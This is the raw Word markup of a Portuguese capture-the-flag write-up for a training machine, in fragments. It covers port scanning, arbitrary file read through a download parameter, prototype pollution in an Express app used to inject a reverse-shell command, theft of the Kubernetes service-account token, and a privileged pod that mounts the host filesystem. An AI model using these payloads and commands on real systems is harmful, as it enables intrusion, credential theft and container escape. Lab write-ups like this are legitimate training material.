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um4szuvq2sz3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vmtddn21cpg5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g1nkbwwe5njm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realizada a enumeração da máquina. Para isso, utilizou-se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objetivo de identificar quais portas estavam abertas e quais serviços estavam expostos na aplicação web.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nmap -p- --open --min-rate 1200 &lt;machine-ip&gt; -sVC -vvv</w:t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6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identificadas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22/TCP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abertas no alvo.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a aplicação web em execução.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79988"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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9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navegação pela aplicação, foram identificadas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duas funcionalidades principais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Uma das funcionalidades identificadas foi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sistema de reservas de viagem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Essa funcionalidade foi interceptada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análise das requisições enviadas pelo input da aplicação.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94263"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"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2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7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segunda funcionalidade identificada foi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download de um arquivo PDF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contendo informações sobre a viagem. Essa requisição também foi interceptada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sua análise detalhada.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7133"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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13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03838"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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8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interceptar essa requisição, foi identificado um parâmetro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qual fazia referência ao arquivo que estava sendo lido e processado pela aplicação web.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7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esse parâmetro não estava devidamente sanitizado, tornou-se possível referenciar arquivos internos do sistema, caracterizando uma falha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leitura arbitrária de arquivos (File Read)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 Dessa forma, foi possível realizar a leitura de arquivos internos do sistema, como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36800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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876800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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mesma forma, foi possível realizar a leitura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arquivos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própria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aplicação web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qual continha todo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aplicação.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7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79900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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Código-fonte da aplicação web.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require('express');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bodyParser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require('body-parser');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require('child_process');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require('path');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app.use(bodyParser.json());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app.use(bodyParser.urlencoded({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app.use(express.static(path.join(__dirname,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'public')));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isObject(obj)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'object'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(isObject(target[key])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isObject(source[key]))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merge(target[key],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target[key]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clone(obj)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merge({},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constructor(data)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'Guest';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this.passengers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data.passengers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this.tour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data.tour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'standard';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Date.now();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(this.sendEmail)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exec(this.sendEmail);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passengers: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this.passengers,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this.tour,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'confirmed'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res.sendFile(path.join(__dirname,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'index.html'));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app.get('/api/download',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req.query.file;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(!file)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res.status(400).send('File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absolute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path.resolve('downloads/'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res.download(absolute);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app.get('/api/tours',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res.json([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'Treasure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Adventure',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treasure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seas!'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Cruise',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buccaneer!'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adventure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activities!'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app.post('/api/book',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clone(req.body);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Booking(bookingData);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booking.confirm();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bookings.push(confirmation);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res.status(500).json({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app.get('/api/bookings',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res.json(bookings);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app.listen(PORT,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'0.0.0.0',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console.log(`Captain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${PORT}`);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Neste código, foi identificada uma vulnerabilidade crítica chamada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Prototype Pollution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a execução remota de comandos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(RCE) no servidor.</w:t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todo objeto herda propriedades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um prototype (protótipo),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funciona como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"classe pai"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compartilhada por todos os objetos da aplicação. Essa característica da linguagem, quando mal implementada, pode ser explorada.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merge()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valida propriedades especiais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(__proto__, constructor, prototype),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que um atacante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manipule o prototype do objeto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global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Object.prototype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injete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propriedades maliciosas que serão herdadas por todas as instâncias de objetos da aplicação.</w:t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(isObject(target[key])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isObject(source[key]))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merge(target[key],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target[key]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__proto__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essa falha, foi possível obter a execução de comandos no sistema.</w:t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utilizado para estabelecer uma conexão reversa, usando a opção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executar o interpretador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/bin/sh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após a conexão ser realizada.</w:t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"Pirate",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"test@test.com",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"__proto__":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"sendEmail":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&lt;port&gt;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13100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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com isso, foi estabelecida uma conexão reversa com o alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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7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w7et9kb76koj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/app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encontrados arquivos relevantes, incluindo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indica que a aplicação está sendo executada dentro de um contêiner, e também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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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verificar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/var/run/secrets/kubernetes.io/serviceaccount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identificados arquivos de configuração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incluindo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autenticação e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namespace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associado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 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22700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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fobbd8drv8v8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esses dois arquivos, é possível verificar se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service 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permissões suficientes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criar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ou escalar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 privilegiado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cluster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Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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seguida, exportamos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autenticação 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namespace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associados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 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testar a possibilidade de criação ou escalonamento de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privilegiado no cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB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TOKEN=$(cat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/var/run/secrets/kubernetes.io/serviceaccount/token)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NAMESPACE=$(cat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/var/run/secrets/kubernetes.io/serviceaccount/namespace)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81675" cy="600075"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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000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realizar a criação desse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necessário um arquivo de configuração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(kubeconfig)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utilizado pela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O arquivo foi baixado para a máquina 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"https://dl.k8s.io/release/$(curl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https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"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2500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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criado um arquivo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pod.yaml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pela criação de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 privilegiado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executado como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em modo privilegiado, permitindo acesso direto aos recursos do sistema do host e, consequentemente, rompendo o isolamento padrão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vert-root-pod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imagePullPolicy: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runAsUser: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runAsGroup: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["/bin/sh"]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["-c",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infinity"]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volumeMounts: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mountPath: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52900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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realizamos a criação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--server=https://kubernetes.default.svc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--token="$TOKEN"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--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt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30300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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obtido um shell interativo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(/bin/sh)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dentro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Pod,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namespace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autenticando-se por meio do token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ServiceAccount do cluster,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que permitiu a execução de comandos diretamente no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contêiner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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--server=https://kubernetes.default.svc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--token="$TOKEN"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--certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt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vert-root-pod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04900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="8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sendo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modo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privilegiado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montar o diretório raiz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host dentro do contêiner, obtendo acesso irrestrito aos arquivos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sistema operacional do host e comprometendo totalmente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isolamento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df -h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listar todas as partições do sistema. A partir dessas informações, identificamos a partição correspondente ao diretório raiz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do host, neste caso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/dev/root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qual foi montada no contêiner, permitindo acesso aos arquivos do sistema do host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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06600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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as partições foram montadas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381500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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passamos a ter acesso a todos os arquivos do sistema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incluindo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onde se encontrava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flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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16100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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headerReference r:id="rId35" w:type="even"/>
      <w:footerReference r:id="rId36" w:type="default"/>
      <w:footerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.erybp8ewxga1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88" name="image27.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image27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85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6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Captain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6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2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24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25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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hyperlink" Target="https://app.hackingclub.com/training/training-machines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14.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml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38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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GsaS/B1dnMlg8O/D8TsiY6hsKg==">CgMxLjAyDmgudW00c3p1dnEyc3ozMg5oLnZtdGRkbjIxY3BnNTIOaC5nMW5rYnd3ZTVuam0yDmgudzdldDlrYjc2a29qMg5oLmZvYmJkOGRydjh2ODIOaC5lcnlicDhld3hnYTE4AHIhMURUUzVUMklqc25wdFFrMlIxbXVCa0t2U1lIMjdHS1pW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